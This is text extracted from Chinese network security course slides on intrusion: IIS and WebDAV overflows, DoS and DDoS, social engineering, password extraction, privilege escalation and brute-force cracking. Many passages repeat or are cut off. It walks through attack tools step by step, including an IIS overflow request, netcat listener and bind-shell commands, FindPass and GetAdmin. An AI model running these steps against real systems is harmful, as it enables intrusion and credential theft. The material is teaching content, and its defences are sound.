攻擊的全過程IIS溢出原理IIS緩沖區(qū)溢出IIS:windows系統(tǒng)上最不安全的服務ISAPI提供對管理腳本(.ida文件)和Inernet數(shù)據(jù)(.idq)查詢的支持向idq.dll發(fā)送一個過量的變量GET/null.ida?[buffer]=XHTTP/1.1Host:[任意值]一些具體的攻擊方法沒有公開CodeRed蠕蟲利用了這一漏洞2IIS溢出原理IIS緩沖區(qū)溢出2利用IIS溢出進行攻擊案例5-11利用IIS溢出入侵系統(tǒng)利用軟件SnakeIIS溢出工具可以讓對方的IIS溢出,還可以捆綁執(zhí)行的命令和在對方計算機上開辟端口,工具軟件的主界面如圖5-38所示。2利用IIS溢出進行攻擊案例5-11利用IIS溢出入侵系統(tǒng)2該軟件適用于各種類型的操作系統(tǒng),比如對09進行攻擊,09的操作系統(tǒng)的Windows2000,沒有安裝補丁程序,攻擊完畢后,開辟一個813端口,并在對方計算機上執(zhí)行命令“dirc:\”設置如圖5-39所示。利用IIS溢出進行攻擊2該軟件適用于各種類型的操作系統(tǒng),比如對點擊按鈕“IDQ溢出”,出現(xiàn)攻擊成功的提示框,如圖5-40所示。2利用IIS溢出進行攻擊點擊按鈕“IDQ溢出”,出現(xiàn)攻擊成功的提示框,如圖5-40所這個時候,813端口已經(jīng)開放,利用工具軟件nc.exe連接到該端口,將會自動執(zhí)行剛才發(fā)送的DOS命令“dirc:\”,使用的語法是:nc.exe-vv09813,其中-vv是程序的參數(shù),813是目標端口??梢钥吹矫畹膱?zhí)行結(jié)果,如圖5-41所示。利用IIS溢出進行攻擊2這個時候,813端口已經(jīng)開放,利用工具軟件nc.exe連接到監(jiān)聽本地端口

下面利用nc.exe和snake工具的另外一種組合入侵對方計算機。首先利用nc.exe命令監(jiān)聽本地的813端口。使用的基本語法是“nc-l-p813”,執(zhí)行的過程如圖5-42所示。監(jiān)聽本地端口下面利用nc.exe和snake工具的另外一種這個窗口就這樣一直保留,啟動工具軟件snake,本地的IP地址是10,要攻擊的計算機的IP地址是09,選擇溢出選項中的第一項,設置IP為本地IP地址,端口是813,如圖5-43所示。監(jiān)聽本地端口

這個窗口就這樣一直保留,啟動工具軟件snake,本地的IP地設置好以后,點擊按鈕“IDQ溢出”,程序顯示對話框如圖4-44所示。監(jiān)聽本地端口

設置好以后,點擊按鈕“IDQ溢出”,程序顯示對話框如圖4-4查看nc命令的DOS框,在該界面下,已經(jīng)執(zhí)行了設置的DOS命令。將對方計算機的C盤根目錄列出來,如圖4-45所示。監(jiān)聽本地端口

查看nc命令的DOS框,在該界面下,已經(jīng)執(zhí)行了設置的DOS命IIS默認提供了對WebDav的支持,通過WebDav可以通過HTTP向用戶提供遠程文件存儲的服務。但是WebDav使用了ntDll.dll函數(shù),這個函數(shù)對在長度檢查中存在一個整數(shù)溢出問題,可以利用此漏洞獲取權(quán)限。WebDav遠程溢出原理3IIS默認提供了對WebDav的支持,通過WebDav可以通需要使用工具軟件nc.exe和webdavx3.exe,首先在DOS命令行下執(zhí)行webdavx3.exe,如果執(zhí)行的話,該程序?qū)⑻崾疽呀?jīng)過期了,如圖4-46所示。利用WebDav遠程溢出3需要使用工具軟件nc.exe和webdavx3.exe,首先攻擊修改本地系統(tǒng)時間到2001年,這樣就可以攻擊了,在命令后面直接跟對方的IP地址就可以了,現(xiàn)在要攻擊的計算機是09,執(zhí)行情況如圖4-47所示。攻擊修改本地系統(tǒng)時間到2001年,這樣就可以攻擊了,在命令后入侵對方的計算機該程序不能自動退出,當發(fā)現(xiàn)程序長時間沒有反映的時候,需要手工按下“CTRL+C”退出程序。該程序在對方的計算機上開了一個端口7788,依然可以nc.exe程序入侵對方的計算機,過程如圖4-48所示。入侵對方的計算機該程序不能自動退出,當發(fā)現(xiàn)程序長時間沒有反映拒絕服務攻擊5.7SYN風暴1Smurf攻擊2

利用處理程序錯誤進行攻擊3拒絕服務攻擊5.7SYN風暴1Smurf攻擊2利用處拒絕服務攻擊介紹拒絕服務攻擊的簡稱是:DoS(DenialofService)攻擊,凡是造成目標計算機拒絕提供服務的攻擊都稱為DoS攻擊,其目的是使目標計算機或網(wǎng)絡無法提供正常的服務。最常見的DoS攻擊是:計算機網(wǎng)絡帶寬攻擊和連通性攻擊。帶寬攻擊是以極大的通信量沖擊網(wǎng)絡,使網(wǎng)絡所有可用的帶寬都被消耗掉,最后導致合法用戶的請求無法通過。連通性攻擊指用大量的連接請求沖擊計算機,最終導致計算機無法再處理合法用戶的請求。拒絕服務攻擊介紹拒絕服務攻擊的簡稱是:DoS(DenialDoS的技術(shù)歷史早期的Internet蠕蟲病毒RobertMorris的RTM蠕蟲消耗網(wǎng)絡資源分片裝配,非法的TCP標志,SYNFlood,等利用系統(tǒng)實現(xiàn)上的缺陷,點對點形式PingofDeath,IP分片重疊分布式DoS(DDoS)攻擊最著名的smurf攻擊DoS的技術(shù)歷史早期的Internet蠕蟲病毒針對不同的系統(tǒng),攻擊的結(jié)果可能不同,但是攻擊的根本都是利用這些系統(tǒng)中TCP/IP協(xié)議族的設計弱點和缺點.只有對現(xiàn)有TCP/IP協(xié)議族進行重大改變才能修正這些缺陷。目前還沒有一個完整的解決方案,但是可以采取一些措施盡量降低這種攻擊發(fā)生的可能性,減少損失。SYN風暴1針對不同的系統(tǒng),攻擊的結(jié)果可能不同,但是攻擊的根本都是利用這IP協(xié)議是Internet網(wǎng)絡層的標準協(xié)議,提供了不可靠的無連接的網(wǎng)絡分組傳輸服務。IP協(xié)議的基本數(shù)據(jù)傳輸單元成為網(wǎng)絡包。TCP協(xié)議位于IP協(xié)議和應用層協(xié)議之間,提供了可靠的面向連接數(shù)據(jù)流傳輸服務。TCP通過流控制機制和重傳等技術(shù)來實現(xiàn)可靠的數(shù)據(jù)報傳輸。SYN風暴背景介紹IP協(xié)議是Internet網(wǎng)絡層的標準協(xié)議,提供了不可靠的無握手的第一報文段的碼元字段的SYN為被置1.第二個報文的SYN和ACK問均被置1,指出這是對第一個SYN報文段的確認并繼續(xù)握手操作。最后一個握手報文僅僅是一個確認信息,通知目標主機已成功建立了雙方所同意的這個連接。SYN風暴背景介紹握手的第一報文段的碼元字段的SYN為被置1.第二個報文的SY針對每個連接,連接雙方都要為該連接分配以下內(nèi)存資源。(1)socket結(jié)構(gòu):描述所使用的協(xié)議、狀態(tài)信息、地址信息、連接隊列、緩沖區(qū)和其他標志位等。(2)Internet協(xié)議控制塊結(jié)構(gòu):描述TCP狀態(tài)信息、IP地址、端口號、IP頭原型、目標地址及其其他選項等。(3)TCP控制塊結(jié)構(gòu):描述時鐘信息、序列號、流控制信息及帶外數(shù)據(jù)等。SYN風暴背景介紹針對每個連接,連接雙方都要為該連接分配以下內(nèi)存資源。SYN風SYN-SENTESTAB-LISHEDSYN-RCVDLISTENESTAB-LISHED用三次握手建立TCP連接的各狀態(tài)

SYN=1,seq=xACK=1,seq=x+1,ack=y1CLOSEDCLOSED數(shù)據(jù)傳送主動打開被動打開AB客戶服務器SYN=1,ACK=1,seq=y,ack=x1SYN-ESTAB-SYN-LISTENESTAB-用三次握在B返回一個確認的SYN-ACK包的時候有個潛在的弊端,他可能不會接到A回應的ACK包。這個也就是所謂的半開放連接,B需要

耗費一定的數(shù)量的系統(tǒng)內(nèi)存來等待這個未決的連接,雖然這個數(shù)量是受限的,但是惡意者可以通過創(chuàng)建很多的半開放式連接來發(fā)動SYN洪水攻擊

。

SYN風暴攻擊手段在B返回一個確認的SYN-ACK包的時候有個潛在的弊端,他可通過ip欺騙可以很容易的實現(xiàn)半開放連接。攻擊者發(fā)送SYN包給受害者系統(tǒng),這個看起來是合法的,但事實上所謂的C根本不會回應這個

。SYN-ACK報文,這意味著受害者將永遠不會接到ACK報文。而此時,半開放連接將最終耗用受害者所有的系統(tǒng)資源,受害者將不能再接收任何其他的請求。SYN風暴攻擊手段通過ip欺騙可以很容易的實現(xiàn)半開放連接。攻擊者發(fā)送SYN包給通常等待ACK返回包有超時限制,所以半開放,連接將最終超時,而受害者系統(tǒng)也會自動修復。雖然這樣,但是在受害者系統(tǒng)修復之前,攻擊者可以很容易的一直發(fā)送虛假的SYN請求包來持續(xù)攻擊。SYN風暴攻擊手段通常等待ACK返回包有超時限制,所以半開放,連接將最終超時,在大多數(shù)情況下,受害者幾乎不能接受任何其他的請求,但是這種攻擊不會影響到已經(jīng)存在的進站或者是出站連接。雖然這樣,受害者系統(tǒng)

還是可能耗盡系統(tǒng)資源,以導致其他種種問題。攻擊系統(tǒng)的位置幾乎是不可確認的,因為SYN包中的源地址多數(shù)都是虛假的。當SYN包到達受害者系統(tǒng)的時候,沒有辦法找到他的真實地址

。

SYN風暴攻擊手段在大多數(shù)情況下,受害者幾乎不能接受任何其他的請求,但是這種攻SYN風暴攻擊過程

SYN-RCVDLISTEN偽造源地址的SYN包PortfloodingoccursCLOSEDCLOSED被動打開AB攻擊者A目標主機BSYN+ACKSYN風暴攻擊過程SYN-LISTEN偽造源地址的SYN包常用的防范方法包括5個方面:1、優(yōu)化系統(tǒng)配置:縮短超時時間;增加半連接隊列的長度關(guān)閉不重要的服務2、優(yōu)化路由器配置:配置路由器的外網(wǎng)卡配置路由器的內(nèi)網(wǎng)卡

分析與對抗常用的防范方法包括5個方面:分析與對抗3、完善基礎設施4、使用防火墻:5、主動監(jiān)視分析與對抗3、完善基礎設施分析與對抗Smurf攻擊是以最初發(fā)動這種攻擊的程序名Smurf來命名的。這種攻擊方法結(jié)合使用了IP欺騙和帶有廣播地址的ICMP請求-響應方法使大量網(wǎng)絡傳輸充斥目標系統(tǒng),引起目標系統(tǒng)拒絕為正常系統(tǒng)進行服務,屬于間接、借力攻擊方式。任何連接到互聯(lián)網(wǎng)上的主機或其他支持ICMP請求-響應的網(wǎng)絡設備都可能成為這種攻擊的目標。Smurf攻擊2Smurf攻擊是以最初發(fā)動這種攻擊的程序名Smurf來命名的原理:攻擊者偽造一個ICMPecho請求包,其源地址為目標受害者地址,目的地址為中間脆弱網(wǎng)絡的廣播地址,并將該echo請求包發(fā)送到中間脆弱網(wǎng)絡。中間脆弱網(wǎng)絡中的主機收到該echo請求包時,會以echo響應包作為回答,而這些包最終被發(fā)送到目標受害者。這樣大量同時返回的echo響應數(shù)據(jù)包造成目標網(wǎng)絡嚴重擁塞、丟包,甚至完全不可用等現(xiàn)象。Smurf攻擊手段原理:攻擊者偽造一個ICMPecho請求包,其源地址為目標Smurf攻擊手段Smurf攻擊手段攻擊特征涉及到三方:攻擊者,中間目標網(wǎng)絡,受害者以較小的網(wǎng)絡帶寬資源,通過放大作用,吃掉較大帶寬的受害者系統(tǒng)Smurf放大器Smurf放大器網(wǎng)絡:不僅允許ICMPEcho請求發(fā)給網(wǎng)絡的廣播地址,并且允許ICMPEcho-Reply發(fā)送回去這樣的公司越多,對Internet的危害就越大Smurf攻擊手段攻擊特征Smurf攻擊手段實施Smurf攻擊需要長期的準備,首先找到足夠多的中間網(wǎng)絡集中向這些中間網(wǎng)絡發(fā)出ICMPEcho包Smurf攻擊手段實施Smurf攻擊Smurf攻擊手段針對最終受害者沒有直接的方法可以阻止自己接收ICMPEchoReply消息在路由器上阻止這樣的應答消息,但是,結(jié)果是,路由器本身遭受了DoS攻擊與中間目標網(wǎng)絡聯(lián)系針對中間網(wǎng)絡關(guān)閉外來的IP廣播消息,但是,如果攻擊者從內(nèi)部機器發(fā)起攻擊,仍然不能阻止smurf攻擊配置操作系統(tǒng),對于廣播地址的ICMP包不響應Smurf攻擊的防止措施針對最終受害者Smurf攻擊的防止措施針對發(fā)起攻擊的主機及其網(wǎng)絡:在路由器上配置其過濾規(guī)則,丟棄那些即將發(fā)到外部網(wǎng)而源IP地址不具有內(nèi)部網(wǎng)絡地址的包。Smurf攻擊的防止措施針對發(fā)起攻擊的主機及其網(wǎng)絡:Smurf攻擊的防止措施SYNflooding和Smurf攻擊利用TCP/IP協(xié)議中的設計弱點,通過強行引入大量的網(wǎng)絡包來占用帶寬。迫使彌補受害主機拒絕對正常的服務請求進行響應。利用處理程序錯誤進行攻擊3SYNflooding和Smurf攻擊利用TCP/IP協(xié)議原理:利用TCP/IP協(xié)議實現(xiàn)中的處理程序錯誤進行攻擊,即故意錯誤地設定數(shù)據(jù)包頭的一些重要字段。將這些錯誤的IP數(shù)據(jù)包發(fā)送出去。在接收端,服務程序通常都存在一些問題,因而在將接收到的數(shù)據(jù)包組裝成一個完整的數(shù)據(jù)包的過程中,就會使系統(tǒng)當機、掛起或崩潰,從而無法繼續(xù)提供服務。利用處理程序錯誤進行攻擊3原理:利用TCP/IP協(xié)議實現(xiàn)中的處理程序錯誤進行攻擊,即故PingofDeath發(fā)送異常的(長度超過IP包的最大值)TeardropIP包的分片裝配Land程序發(fā)送一個TCPSYN包,源地址與目的地址相同,源端口與目的端口相同,從而產(chǎn)生DoS攻擊一些利用處理程序錯誤進行攻擊例子PingofDeath一些利用處理程序錯誤進行攻擊例子PingofDeath原理:直接利用ping包,即ICMPEcho包,有些系統(tǒng)在收到大量比最大包還要長的數(shù)據(jù)包,會掛起或者死機受影響的系統(tǒng):許多操作系統(tǒng)受影響攻擊做法直接利用ping工具,發(fā)送超大的ping數(shù)據(jù)包防止措施打補丁防火墻阻止這樣的ping包PingofDeath原理:直接利用ping包,即ICMTeardropTeardrop分布式拒絕服務攻擊5.8Ddos的特點1攻擊手段2Ddos的著名攻擊工具3拒絕服務攻擊的發(fā)展趨勢4分布式拒絕服務攻擊5.8Ddos的特點1攻擊手段2D1999年7月,出現(xiàn)了分布式拒絕服務攻擊,根據(jù)其攻擊的方式也可稱為協(xié)同拒絕服務攻擊。分布式攻擊系統(tǒng)一般都是基于客戶—服務器模式DDoS的介紹1999年7月,出現(xiàn)了分布式拒絕服務攻擊,根據(jù)其攻擊的方式也分布式拒絕服務攻擊的特點:先使用一些典型的黑客入侵手段控制一些高帶寬的服務器,然后在這些服務器上安裝攻擊進程,集數(shù)十臺,數(shù)百臺甚至上千臺機器的力量對單一攻擊目標實施攻擊。具有隱蔽性和分布性很難被識別和防御DDoS的特點1分布式拒絕服務攻擊的特點:DDoS的特點1DDoS攻擊的結(jié)構(gòu)1攻擊者主控端分布端目標主機DDoS攻擊的結(jié)構(gòu)1攻擊者主控端分布端目標主機攻擊者在客戶端操縱攻擊過程。每個主控端是一臺已被攻擊者入侵并運行了特定程序的系統(tǒng)主機。每個主控端主機能夠控制多個代理端/分布端。每個代理端也是一臺已被入侵并云溪某種特定程序的系統(tǒng)主機,是執(zhí)行攻擊的角色。多個分布端能夠同時響應攻擊命令并向被攻擊目標主機發(fā)送拒絕服務攻擊數(shù)據(jù)包攻擊手段2攻擊者在客戶端操縱攻擊過程。每個主控端是一臺已被攻擊者入侵并攻擊過程實施的順序為:攻擊者---主控端---分布端---目標主機發(fā)動DDoS攻擊分為兩個階段:1、初始的大規(guī)模入侵階段:利用自動工具掃描遠程脆弱主機,對遠程主機進行控制,并安裝DDoS代理端攻擊手段2攻擊過程實施的順序為:攻擊手段22、大規(guī)模DoS攻擊階段:通過主控端和代理端對目標受害主機發(fā)起大規(guī)模拒絕服務攻擊。攻擊手段22、大規(guī)模DoS攻擊階段:攻擊手段2DDoS比較著名的攻擊工具包括:Trin00,TFN,Stacheldraht和TFN2KDDoS的著名攻擊工具3DDoS比較著名的攻擊工具包括:DDoS的著名攻擊工具3DoS攻擊的發(fā)展趨勢:采用IP欺騙技術(shù),以隱藏攻擊者的行蹤DoS技術(shù)和工具不斷推陳出新,呈現(xiàn)由單一攻擊源發(fā)起攻擊,轉(zhuǎn)變?yōu)橛啥鄠€中間攻擊源對單一目標進攻的趨勢。智能化,新的工具將試圖躲過IDS的跟蹤,并繞過防火墻的防御體系拒絕服務攻擊的發(fā)展趨勢4DoS攻擊的發(fā)展趨勢:拒絕服務攻擊的發(fā)展趨勢4針對路由器弱點的DDoS攻擊將會增多采用半連接技術(shù)SYN攻擊和針對TCP/IP協(xié)議先天缺陷的ACK攻擊,將是新的DDoS攻擊趨勢。這種攻擊防火墻也難以防止。拒絕服務攻擊的發(fā)展趨勢4針對路由器弱點的DDoS攻擊將會增多拒絕服務攻擊的發(fā)展趨勢4針對不同的攻擊方式,采取不同的解決方案1、破壞物理設備防范措施:檢查物理實體的安全;使用容錯和冗余網(wǎng)絡硬件的方法。2、破壞配置文件防范措施:管理員正確的配置系統(tǒng)及其相關(guān)軟件的配置信息,適當?shù)膫浞菝舾械男畔ⅲ焕肨ripwire等工具檢測,并及時恢復。防范拒絕服務攻擊5針對不同的攻擊方式,采取不同的解決方案防范拒絕服務攻擊53、利用網(wǎng)絡協(xié)議或系統(tǒng)的設計弱點和實現(xiàn)漏洞防范措施:重新設計協(xié)議層,加入更多的安全控制機制。4、消耗系統(tǒng)資源防范拒絕服務攻擊53、利用網(wǎng)絡協(xié)議或系統(tǒng)的設計弱點和實現(xiàn)漏洞防范拒絕服務攻擊5管理員要管理好自己的網(wǎng)絡,可以采取下面這些行之有效的防范措施:及時給系統(tǒng)打補丁,設置正確的安全策略定期檢查系統(tǒng)安全:檢查是否被安裝了DDoS攻擊程序,是否存在后門等。建立資源分配模型,設置閾值,統(tǒng)計敏感資源的使用情況。優(yōu)化路由器配置防范拒絕服務攻擊5管理員要管理好自己的網(wǎng)絡,可以采取下面這些行之有效的防范措施利用第三方的日志分析系統(tǒng)使用DNS來跟蹤匿名攻擊對于重要的WEB服務器,為一個域名建立多個鏡像主機。防范拒絕服務攻擊5利用第三方的日志分析系統(tǒng)防范拒絕服務攻擊5演講完畢,謝謝觀看!演講完畢,謝謝觀看!計算機網(wǎng)絡安全教程計算機網(wǎng)絡安全教程第五章網(wǎng)絡入侵

5.1物理攻擊與防范5.2

暴力攻擊5.3Unicode漏洞專題5.4社會工程學攻擊5

5.5緩沖區(qū)溢出攻擊5.6

拒絕服務攻擊5.7分布式拒絕服務攻擊5.8其他漏洞攻擊

防范拒絕服務攻擊5.9第五章網(wǎng)絡入侵5.1物理攻擊與防范5.2暴力攻擊5.社會工程學攻擊5.1社交工程是使用計謀和假情報去獲得密碼和其他敏感信息的科學,研究一個站點的策略其中之一就是盡可能多的了解這個組織的個體,因此黑客不斷試圖尋找更加精妙的方法從他們希望滲透的組織那里獲得信息。社會工程學攻擊5.1社交工程是使用計謀和假情報去獲得密碼和其社會工程學攻擊舉個例子:一組高中學生曾經(jīng)想要進入一個當?shù)氐墓镜挠嬎銠C網(wǎng)絡,他們擬定了一個表格,調(diào)查看上去顯得是無害的個人信息,例如所有秘書和行政人員和他們的配偶、孩子的名字,這些從學生轉(zhuǎn)變成的黑客說這種簡單的調(diào)查是他們社會研究工作的一部分。利用這份表格這些學生能夠快速的進入系統(tǒng),因為網(wǎng)絡上的大多數(shù)人是使用寵物和他們配偶名字作為密碼。社會工程學攻擊舉個例子:一組高中學生曾經(jīng)想要進入一個當?shù)氐墓W(wǎng)絡攻擊技術(shù)-社交工程黑客們最常用的一種攻擊手段能得到使用技術(shù)手段不能得到的好處防火墻和IDS對這種攻擊不起作用需要高超的人際交往技術(shù)常用方式電話電子商務網(wǎng)絡攻擊技術(shù)-社交工程黑客們最常用的一種攻擊手段網(wǎng)絡攻擊技術(shù)-社交工程社交工程種類假冒權(quán)威假扮同情個人利益改善自我感覺不引人注意的職業(yè)獎賞網(wǎng)絡攻擊技術(shù)-社交工程社交工程種類社交工程(SocialEngineering)假冒權(quán)威黑客冒充公司的領(lǐng)導人員在大公司中,不認識所有上司的情況非常普通在Internet上,黑客可以通過郵件列表發(fā)出入侵的安全警告,并提供解決問題的指令,指令被設計成能使黑客訪問系統(tǒng)。足夠顯眼的標題和時髦的行話社交工程(SocialEngineering)假冒權(quán)威社交工程(SocialEngineering)假扮電話、電子郵件、聊天室和短消息里假扮你的熟人如果你是新來的職員,冒充你的同事同情如果一個人打電話來,講述他的困難,你不幫助他嗎?個人利益假冒來自財務部門的員工,訪問系統(tǒng)管理員社交工程(SocialEngineering)假扮社交工程(續(xù))改善自我感覺自我感覺良好的人易于被欺騙黑客進入熱情的經(jīng)理房間,表明自己是來自市場部的新員工,會得到詳細的介紹社交工程(續(xù))改善自我感覺社交工程(續(xù))不引人注意的職業(yè)來自天然氣、電力公司或者電話公司的員工請求撥號等上機操作人們會單獨把黑客放在房間里獎賞提供某種形式的獎賞會引誘人泄露信息口令比賽-贏大獎、展示創(chuàng)造性,請列出密碼社交工程(續(xù))不引人注意的職業(yè)避免受到社交工程攻擊極度警惕Donottrustanystranger即使是很友好的人懷疑一切聲稱并不代表他有權(quán)這樣做詢問他們的權(quán)限絕大多數(shù)社交工程在高度警惕下破產(chǎn)避免受到社交工程攻擊極度警惕避免受到社交工程攻擊(續(xù))驗證出處當某人電子郵件要求時,要求來電話確證對于電話里的請求,要求回電號碼并確證員工號碼或者身份證避免受到社交工程攻擊(續(xù))驗證出處避免受到社交工程攻擊(續(xù))說不對于逾越日常行為準則的要求,要拒絕要求按照正常程序和規(guī)定書面報告和授權(quán)信息用戶培訓培訓員工,提高安全意識避免受到社交工程攻擊(續(xù))說不物理攻擊與防范5.2

獲取管理員密碼1權(quán)限提升2物理攻擊與防范5.2獲取管理員密碼1權(quán)限提升2物理安全是保護一些比較重要的設備不被接觸。物理安全比較難防,因為攻擊往往來自能夠接觸到物理設備的用戶。

引言物理安全是保護一些比較重要的設備不被接觸。引言獲取管理員密碼1用戶登錄以后,所有的用戶信息都存儲在系統(tǒng)的一個進程中,這個進程是:“winlogon.exe”,WindowsLogonProcess,WindowsNT用戶登陸程序,管理用戶登錄和退出。該進程的正常路徑應是

C:\Windows\System32且是以

SYSTEM用戶運行獲取管理員密碼1用戶登錄以后,所有的用戶信息都存儲在系統(tǒng)的一獲取管理員密碼1案例5-1得到管理員密碼用戶登錄以后,所有的用戶信息都存儲在系統(tǒng)的一個進程中,這個進程是:“winlogon.exe”,可以利用程序?qū)斍暗卿浻脩舻拿艽a解碼出來,如圖5-1所示。獲取管理員密碼1案例5-1得到管理員密碼獲取管理員密碼1使用FindPass等工具可以對該進程進行解碼,然后將當前用戶的密碼顯示出來。將FindPass.exe拷貝到C盤根目錄,執(zhí)行該程序,將得到當前用戶得登錄名,如圖5-2所示。獲取管理員密碼1使用FindPass等工具可以對該進程進行解權(quán)限提升2有時候,管理員為了安全,給其他用戶建立一個普通用戶帳號,認為這樣就安全了。常用的方法:社會工程學本地溢出利用scripts目錄的可執(zhí)行權(quán)限替換系統(tǒng)服務替換admin常用程序利用autorun.infServ-U提升權(quán)限SQL帳戶密碼泄露權(quán)限提升2有時候,管理員為了安全,給其他用戶建立一個普通用戶權(quán)限提升2用普通用戶帳號登錄后,可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個具有管理員權(quán)限的用戶。權(quán)限提升2用普通用戶帳號登錄后,可以利用工具GetAdmin案例5-2普通用戶建立管理員帳號利用Hacker帳戶登錄系統(tǒng),在系統(tǒng)中執(zhí)行程序GetAdmin.exe,程序自動讀取所有用戶列表,在對話框中點擊按鈕“New”,在框中輸入要新建的管理員組的用戶名,如圖5-5所示。案例5-2普通用戶建立管理員帳號利用Hacker帳戶登錄系案例5-2普通用戶建立管理員帳號輸入一個用戶名“IAMHacker”,點擊按鈕“確定”以后,然后點擊主窗口的按鈕“OK”,出現(xiàn)添加成功的窗口,如圖5-6所示。案例5-2普通用戶建立管理員帳號輸入一個用戶名“IAMHa暴力攻擊5.3

字典文件1暴力破解操作系統(tǒng)密碼2

暴力破解郵箱密碼3暴力破解軟件密碼4暴力攻擊5.3字典文件1暴力破解操作系統(tǒng)密碼2暴力破暴力攻擊是一種發(fā)現(xiàn)密碼的嘗試,其方法是系統(tǒng)地嘗試字母、數(shù)字和符號的每種可能組合,直到發(fā)現(xiàn)一個可起作用的正確組合。攻擊者總可以通過暴力攻擊獲得密碼,但這種方法的不利之處在于,可能需要數(shù)年才能找到一個密碼。根據(jù)密碼的長度和復雜性,也許有無數(shù)個可能的組合。針對一個安全系統(tǒng)進行暴力攻擊需要大量的時間,需要極大的意志和決心。什么是暴力攻擊暴力攻擊是一種發(fā)現(xiàn)密碼的嘗試,其方法是系統(tǒng)地嘗試字母、數(shù)字和暴力攻擊暴力攻擊的一個具體例子是,一個黑客試圖使用計算機和信息去破解一個密碼。一個黑客需要破解—段單一的被用非對稱密鑰加密的信息,為了破解這種算法,一個黑客需要求助于非常精密復雜的方法,它使用120個工作站,兩個超級計算機利用從三個主要的研究中心獲得的信息,即使擁有這種配備,它也將花掉八天的時間去破解加密算法,實際上破解加密過程八天已是非常短暫的時間了。暴力攻擊暴力攻擊的一個具體例子是,一個黑客試圖使用計算機和信暴力破解兩種方式的破解在線破解在線登錄目標主機,通過程序循環(huán)輸入密碼嘗試正確的密碼輸入可能會在日志里留下記錄,很容易被探測出來離線破解取得目標主機的密碼文件,然后在本地破解花費時間較長,一般時攻擊系統(tǒng)取得一定權(quán)限后使用暴力破解兩種方式的破解在線破解Windows系統(tǒng)使用NAT(NetBIOSAuditingTool)進行探測在NetBIOS開放138,139端口提供SMB服務,允許用戶遠程訪問文件系統(tǒng)Windows2000缺省共享所有驅(qū)動器和admin$訪問文件系統(tǒng)時需要用戶身份驗證NAT可以猜測用戶口令,從而取得目標機器的控制權(quán)NAT用法:nat[-ofilename][-uuserlist][-ppasslist]address在線破解Windows系統(tǒng)在線破解Linux系統(tǒng)一般在telnet三次錯誤后,系統(tǒng)會斷開連接在線破解的軟件較少在線破解Linux系統(tǒng)離線破解得到用戶的密碼文件,然后在本地破解Windows系統(tǒng)用戶密碼存放在%systemroot%\system32\config\和%systemroot%\repair\中得到這個文件后可以使用L0phtcrack進行本地破解離線破解得到用戶的密碼文件,然后在本地破解離線破解Linux系統(tǒng)用戶名和密碼存儲在/etc/passwd中會被很多用戶看到該文件為了加強安全性,將密碼存儲在etc/shadow中只能由root存取著名的破解工具:JohntheRipper因為Linux在線破解困難,所以離線破解比較常見很多管理員現(xiàn)在沒有使用shadow文件離線破解Linux系統(tǒng)暴力破解手段暴力破解的手段字典攻擊強行攻擊組合攻擊暴力破解手段暴力破解的手段字典攻擊字典:一些單詞或者字母和數(shù)字的組合使用字典的好處比較快速的得到用戶密碼,只需要在字典中進行查找字典攻擊字典:一些單詞或者字母和數(shù)字的組合字典攻擊前提前提條件絕大多數(shù)用戶選擇密碼總是有一定規(guī)律的姓名:自己、父母、愛人、孩子生日電話號碼,身份證號碼,學號英文單詞上述組合打開錢包,我就能知道你的密碼設計一個好的字典是非常有必要的字典攻擊前提前提條件字典攻擊防御防止字典攻擊的方法使用帶有特殊字符的密碼密碼不是有規(guī)律的英語單詞字典攻擊防御防止字典攻擊的方法強行攻擊在選定的字母或者數(shù)字序列里生成所有包含這些字母的口令密碼生成器,只要用戶指定字母和數(shù)字和密碼的位數(shù),就能生成字典特點密碼較多,所需時間較長分布式攻擊多臺計算機共同運算適用于對用戶信息不夠了解的情況強行攻擊在選定的字母或者數(shù)字序列里生成所有包含這些字母的口令強行攻擊防御對策使用長的密碼攻擊者需要構(gòu)造出很大的字典,加大攻擊難度經(jīng)常更換密碼需要在方便和安全中作出抉擇強行攻擊防御對策組合攻擊綜合前兩種攻擊的優(yōu)點字典攻擊:速度較快強行攻擊:發(fā)現(xiàn)所有的口令根據(jù)掌握的用戶的不同信息,進行口令組合姓名縮寫和生日的組合在字母組合后面加上一些數(shù)字攻擊速度破解口令數(shù)量字典攻擊快所有字典單詞強行攻擊慢所有口令組合攻擊中等以字典為基礎的單詞組合攻擊綜合前兩種攻擊的優(yōu)點攻擊速度破解口令數(shù)量三種攻擊的比較攻擊速度破解口令數(shù)量字典攻擊快所有字典單詞強行攻擊慢所有口令組合攻擊中等以字典為基礎的單詞三種攻擊的比較攻擊速度破解口令數(shù)量字典攻擊字典文件1一次字典攻擊能否成功,很大因素上決定與字典文件。一個好的字典文件可以高效快速的得到系統(tǒng)的密碼。攻擊不同的公司、不通地域的計算機,可以根據(jù)公司管理員的姓氏以及家人的生日,可以作為字典文件的一部分,公司以及部門的簡稱一般也可以作為字典文件的一部分,這樣可以大大的提高破解效率。字典文件1一次字典攻擊能否成功,很大因素上決定與字典文件。一字典文件1一個字典文件本身就是一個標準的文本文件,其中的每一行就代表一個可能的密碼。目前有很多工具軟件專門來創(chuàng)建字典文件,圖5-8是一個簡單的字典文件。字典文件1一個字典文件本身就是一個標準的文本文件,其中的每一暴力破解操作系統(tǒng)密碼2字典文件為暴力破解提供了一條捷徑,程序首先通過掃描得到系統(tǒng)的用戶,然后利用字典中每一個密碼來登錄系統(tǒng),看是否成功,如果成功則將密碼顯示暴力破解操作系統(tǒng)密碼2字典文件為暴力破解提供了一條捷徑,程序暴力破解操作系統(tǒng)密碼2案例5-3暴力破解操作系統(tǒng)密碼比如使用圖5-8所示的字典文件,利用上一章介紹的工具軟件GetNTUser依然可以將管理員密碼破解出來,如圖5-9所示。暴力破解操作系統(tǒng)密碼2案例5-3暴

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
